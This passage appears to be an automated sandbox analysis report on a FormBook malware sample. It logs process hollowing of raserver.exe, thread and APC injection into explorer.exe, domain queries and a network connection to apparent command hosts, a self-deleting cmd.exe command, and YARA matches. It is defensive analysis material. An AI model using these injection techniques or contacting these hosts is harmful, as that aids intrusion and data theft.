Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.spinecompanion.com
Source: C:\Windows\explorer.exe	Domain query: www.reufhroir.com
Source: C:\Windows\explorer.exe	Domain query: www.pholbhf.icu
Source: C:\Windows\explorer.exe	Domain query: www.dr-farshidtajik.com
Source: C:\Windows\explorer.exe	Network Connect: 217.70.184.50 80			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Users\Public\vbc.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1388			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1388			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Thread register set: target process: 1388			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\Public\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\Public\vbc.exe

Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: B40000

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: explorer.exe, 00000006.00000000.2145193099.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000000.2145193099.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.2168055639.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.2145193099.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Contains functionality to query windows version

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

4_2_00405B88

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2193671756.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.2139121707.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2347827615.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2193556104.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2347889213.0000000000430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2193865699.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.2169573435.000000000293F000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.9760000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.9760000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2193671756.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.2139121707.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2347827615.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2193556104.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2347889213.0000000000430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2193865699.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.2169573435.000000000293F000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.9760000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.9760000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE